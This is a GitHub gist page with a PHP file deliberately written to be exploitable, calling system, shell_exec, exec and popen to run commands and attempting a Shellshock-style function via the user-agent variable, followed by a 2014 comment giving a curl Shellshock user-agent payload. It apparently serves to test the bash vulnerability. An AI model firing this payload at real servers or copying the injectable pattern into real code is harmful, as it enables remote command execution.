Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Nächster Versuch, ein exploitable PHP zu schreiben.
<?php header("Content-Type: text/plain");?>
system("/usr/bin/id") => <?php system("/usr/bin/id"); ?>
shell_exec("/bin/hostname") => <?php echo shell_exec("/bin/hostname"); ?>
shell_exec("/bin/bash -c /bin/date") => <?php echo shell_exec("/bin/bash -c /bin/date"); ?>
exec("/usr/bin/whoami") => <?php echo exec("/usr/bin/whoami"); ?>
popen... => <?php
$fp = popen('/usr/bin/head /etc/issue 2>&1', "r");
// send the current file part to the browser
print fread($fp, 1024);
// flush the content to the browser
shell_exec mit HTTP_USER_AGENT =>
echo shell_exec("HTTP_USER_AGENT(){ /usr/bin/id; }; HTTP_USER_AGENT");

This comment has been minimized.

Copy link

@xambroz xambroz commented Sep 29, 2014

You need to export some variable as a environment variable for the shell to be executed.
This is my example of vulnerable php code:

/';"); ?>

This vulnerable code can be exploited by setting the user agent to something nasty like:
curl --user-agent '() { ignored;} ; /usr/bin/id ;'

Michal Ambroz

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.